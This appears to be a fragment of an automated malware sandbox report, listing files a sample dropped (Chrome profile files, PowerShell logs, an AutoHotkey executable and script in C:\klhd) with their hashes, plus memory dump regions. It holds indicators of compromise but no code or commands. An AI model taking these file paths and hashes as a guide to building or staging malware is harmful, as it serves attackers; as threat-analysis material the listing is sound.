73699322cbc9325f8682ecb300eaa8c5cf8819c5f20cac7487be9cec9e8cecafed2c5c269e4914eb865f9a62d4a614edc08f09420cf845052cfe5ff64ab90fd7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
39b763dd3ac372be2e95adbf40a48631

SHA1
bcca064acf3f87651f53416aa34f69234e35eda9

SHA256
eaae0803994948cd8a05a04b883e755117793f62d82c676e35c6a472576d99e0

SHA512
e0806dcad8375cec18911aa35d4cfed21a5d1faaf9fa3c0cff3d9b15cc60f35cf63902fef81cac51b0ebbee152bcab6b9577ffbe65379d13159b33b411325d0f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
d910ebed131acba6891b9e1a2bc1105d

SHA1
da689a0d243b05e131510576d6eb6eba1278562c

SHA256
045d124912c24d6c0c3a8d41e242c263ae4c282bec227a44dae4b77f3dcfb055

SHA512
ad490c2a8453cceefdad618b0218115b8e67ea9a80cade39a0951374b7cfa09dc3bb26417c64783d5ad6fee7c317000e34e7befce0f4e5f762393196cd5b1525

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
0e6d9a1d92712dbba2aed2bbd4e89a40

SHA1
535a46d8974a710ff51f653a64d1203d8c65c37c

SHA256
19ac4243d56081827dd349a388926a7edd72ddce617a4db6948c0a1c1d068acb

SHA512
e8e12fb1140cc1272c2abcf4d7a3051a172167f99f4cc019e8fbf917a2f744e4b94c39843be4951155e5b8523272fdb2b3b9cdc0ec75d863ea95e9bb20748e77

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
630661fc7a37411c6c0f66962da1858a

SHA1
5dca36fd6724ea7fa98f3cf32adf85f4c09a0172

SHA256
a8b7e2b2ef94df0e260012b649caa07a2b633f061ecf3415ad00aad02eaa9153

SHA512
1069d92fc0563af40a6e591c4e1f06e15c20be1715ad45825182321b66320f717a89e0e4823be8466076f5337e82972319edbbd4799572d2f5e5993ece3be117

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
130KB

MD5
fb3e0a19336c363ed403d982e215be38

SHA1
1dbf8947358f16a3e0db6b6870d89d5ae851cb40

SHA256
125ea5ae886c3afef016378d0fb481cab4b88ba9e7c6a292850049a43c878975

SHA512
2fb8d6f91b2303d619a534f87c1539cf3aad34b06bec7bf2717b7e7836e0b0cc72e9fb8ab9bd81d1c347382136eb37de194adefdbe6b2569960f2c54c4c32413

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
2c64aa22536612920da5641216f191f8

SHA1
debe1b1206f3f61f39df0a0926f939c1b912ef82

SHA256
5e94bb78213ae5e7c4c84af6f4502a9c3b37c6eac26ca846fe474349149e2b22

SHA512
7f01f5c2bd13faecd1992fcad6fccf04dd67946687881e33e502fea33bdcf70da7042867ec216fc7c83bd43d6b17ccf16e9a72f336c1977732444afd4920d2b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c35bc8ea8ea86fb38bf8436d03c72639

SHA1
3249ed7d18985adb0d4f0574432412a76cac9d8e

SHA256
f0f67eb35c7f2f8add75d7df289f51ff0c0f775b5683ff61a774fb75d5fec52b

SHA512
efaaaaeea2055bf6108715601e487fb9c203663557b1acfac4f58e8bfb1417488f494d04f6f192b76a84e0ba92d842152943100c77c08c9850c9796f66b6f271

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2f1e4db0f70a0365a95fda3515fe032c

SHA1
6a452b92eabc5a9a7d11aaf52c1db044d2f92f03

SHA256
991bf72b79be12ef38115bc94cbbfffd0183413174bc4872aeff28ac1be20542

SHA512
eedc629142bf9fa40ebd1ba8d57abe0a65078698770a33d28bbb42e610d6ff0cff01a4e70054db373257ea6b55b9714d51c5cf34cad314ac3b04d707c7a001e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euhhqiy2.an4.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\eCbhced

Filesize
32B

MD5
e3a73467cd52144f4a06d944779903c8

SHA1
af15262c549e2db8f17736d152791abaf9032834

SHA256
54a9bc38d23cd83aa63c2b3bef52e4cfd22ad50b21c3a171b3aa05ec086dd8a1

SHA512
a6f51d170af1ba5568a8593b23b7645bb3a1b969dcd56da0712c969a8135d640f8e3885c0e386467a182a43d1a5dc3be156c031ee74940854a4ae1cb5829afa0

Download Submit
C:\klhd\AutoHotkey.exe

Filesize
892KB

MD5
a59a2d3e5dda7aca6ec879263aa42fd3

SHA1
312d496ec90eb30d5319307d47bfef602b6b8c6c

SHA256
897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

SHA512
852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

Download Submit
C:\klhd\script.ahk

Filesize
52KB

MD5
c7bdf27e38f75176a9ebe95619baec8b

SHA1
4e34dcbbc26131074d1ef7781ceb30c372e7dfba

SHA256
08582b9739946102389b18af358c9390bbf14266ae92919f0dae1988dca9f2cd

SHA512
4bca6524be6f5b4a8e4d2bab211c5600acc8f5c1dce20a11a13ba7bfb41737c109674f417f862efe33f9136d31360296951c32ae4f024bacf1df0f62ad7e5040

Download Submit
C:\klhd\test.txt

Filesize
914KB

MD5
073321722c6c5f6c36f1ab464fbf004a

SHA1
633b351bdd3bd0d45861dae846fdd02c5808addf

SHA256
4544f3d199298653cf630c1bc15a564f2492bb51a77d5a156ca8625142f4e483

SHA512
751a33a24d22adcc10ede5c8bd546143214096dd10f8af8a8f3949983339459566044273f44668ea05dccb09718d023447ca5059f7d2d47a5c3cd1f5bb9d8555

Download Submit
memory/1512-312-0x00000000045A0000-0x0000000004613000-memory.dmp

Filesize
460KB

Download
memory/1512-314-0x00000000045A0000-0x0000000004613000-memory.dmp

Filesize
460KB

Download
memory/1520-200-0x0000000003130000-0x00000000031A3000-memory.dmp

Filesize
460KB

Download
memory/1520-198-0x0000000003130000-0x00000000031A3000-memory.dmp

Filesize
460KB

Download
memory/2640-296-0x00000126F5680000-0x00000126F5690000-memory.dmp

Filesize
64KB

Download
memory/2640-254-0x00007FFABCF30000-0x00007FFABD91C000-memory.dmp

Filesize
9.9MB

Download
memory/2640-311-0x00007FFABCF30000-0x00007FFABD91C000-memory.dmp

Filesize
9.9MB

Download
memory/2640-297-0x00000126F5680000-0x00000126F5690000-memory.dmp

Filesize
64KB

Download
memory/2640-289-0x00000126F5680000-0x00000126F5690000-memory.dmp

Filesize
64KB

Download
memory/2640-288-0x00007FFABCF30000-0x00007FFABD91C000-memory.dmp

Filesize
9.9MB

Download
memory/2640-274-0x00000126F5680000-0x00000126F5690000-memory.dmp

Filesize
64KB

Download
memory/2640-255-0x00000126F5680000-0x00000126F5690000-memory.dmp

Filesize
64KB

Download
memory/3320-220-0x00007FFABCD90000-0x00007FFABD77C000-memory.dmp

Filesize
9.9MB

Download
memory/3320-137-0x0000018F3A600000-0x0000018F3A610000-memory.dmp

Filesize
64KB

Download
memory/3320-139-0x0000018F3A600000-0x0000018F3A610000-memory.dmp

Filesize
64KB

Download
memory/3320-201-0x0000018F3ACF0000-0x0000018F3ADBC000-memory.dmp

Filesize
816KB

Download
memory/3320-160-0x0000018F3A600000-0x0000018F3A610000-memory.dmp

Filesize
64KB

Download
memory/3320-222-0x0000018F3A600000-0x0000018F3A610000-memory.dmp

Filesize
64KB

Download
memory/3320-223-0x0000018F3A600000-0x0000018F3A610000-memory.dmp

Filesize
64KB

Download
memory/3320-224-0x0000018F3A600000-0x0000018F3A610000-memory.dmp

Filesize
64KB

Download
memory/3320-136-0x00007FFABCD90000-0x00007FFABD77C000-memory.dmp

Filesize
9.9MB

Download
memory/3320-244-0x00007FFABCD90000-0x00007FFABD77C000-memory.dmp

Filesize
9.9MB

Download
memory/3320-243-0x0000018F3ACF0000-0x0000018F3ADBC000-memory.dmp

Filesize
816KB

Download
memory/3608-375-0x0000000002D80000-0x0000000002DF3000-memory.dmp

Filesize
460KB

Download
memory/3608-376-0x0000000002D80000-0x0000000002DF3000-memory.dmp

Filesize
460KB

Download
memory/4400-246-0x0000000002D10000-0x0000000002D83000-memory.dmp

Filesize
460KB

Download
memory/4400-248-0x0000000002D10000-0x0000000002D83000-memory.dmp

Filesize
460KB

Download
memory/4732-71-0x00000242A0E30000-0x00000242A0E40000-memory.dmp

Filesize
64KB

Download
memory/4732-129-0x00000242A0E30000-0x00000242A0E40000-memory.dmp

Filesize
64KB

Download
memory/4732-196-0x00007FFABCD90000-0x00007FFABD77C000-memory.dmp

Filesize
9.9MB

Download
memory/4732-195-0x00000242A1250000-0x00000242A131C000-memory.dmp

Filesize
816KB

Download
memory/4732-115-0x00007FFABCD90000-0x00007FFABD77C000-memory.dmp

Filesize
9.9MB

Download
memory/4732-75-0x00000242A10D0000-0x00000242A1146000-memory.dmp

Filesize
472KB

Download
memory/4732-138-0x00000242A0E30000-0x00000242A0E40000-memory.dmp

Filesize
64KB

Download
memory/4732-68-0x00000242A0E40000-0x00000242A0E62000-memory.dmp

Filesize
136KB

Download
memory/4732-100-0x00000242A1250000-0x00000242A131C000-memory.dmp

Filesize
816KB

Download
memory/4732-70-0x00000242A0E30000-0x00000242A0E40000-memory.dmp

Filesize
64KB

Download
memory/4732-69-0x00007FFABCD90000-0x00007FFABD77C000-memory.dmp

Filesize
9.9MB

Download
memory/4732-105-0x00000242A1830000-0x00000242A19F2000-memory.dmp

Filesize
1.8MB

Download
memory/4732-90-0x00000242A0E30000-0x00000242A0E40000-memory.dmp

Filesize
64KB

Download
memory/4732-133-0x00000242A0E30000-0x00000242A0E40000-memory.dmp

Filesize
64KB

Download
memory/4984-319-0x00007FFABCC70000-0x00007FFABD65C000-memory.dmp

Filesize
9.9MB

Download
memory/4984-339-0x00000188D27D0000-0x00000188D27E0000-memory.dmp

Filesize
64KB

Download
memory/4984-352-0x00007FFABCC70000-0x00007FFABD65C000-memory.dmp

Filesize
9.9MB

Download
memory/4984-353-0x00000188D27D0000-0x00000188D27E0000-memory.dmp

Filesize
64KB

Download
memory/4984-354-0x00000188D27D0000-0x00000188D27E0000-memory.dmp

Filesize
64KB

Download
memory/4984-355-0x00000188D27D0000-0x00000188D27E0000-memory.dmp

Filesize
64KB

Download
memory/4984-374-0x00007FFABCC70000-0x00007FFABD65C000-memory.dmp

Filesize
9.9MB

Download
memory/4984-321-0x00000188D27D0000-0x00000188D27E0000-memory.dmp

Filesize
64KB

Download
memory/4984-320-0x00000188D27D0000-0x00000188D27E0000-memory.dmp

Filesize
64KB

Download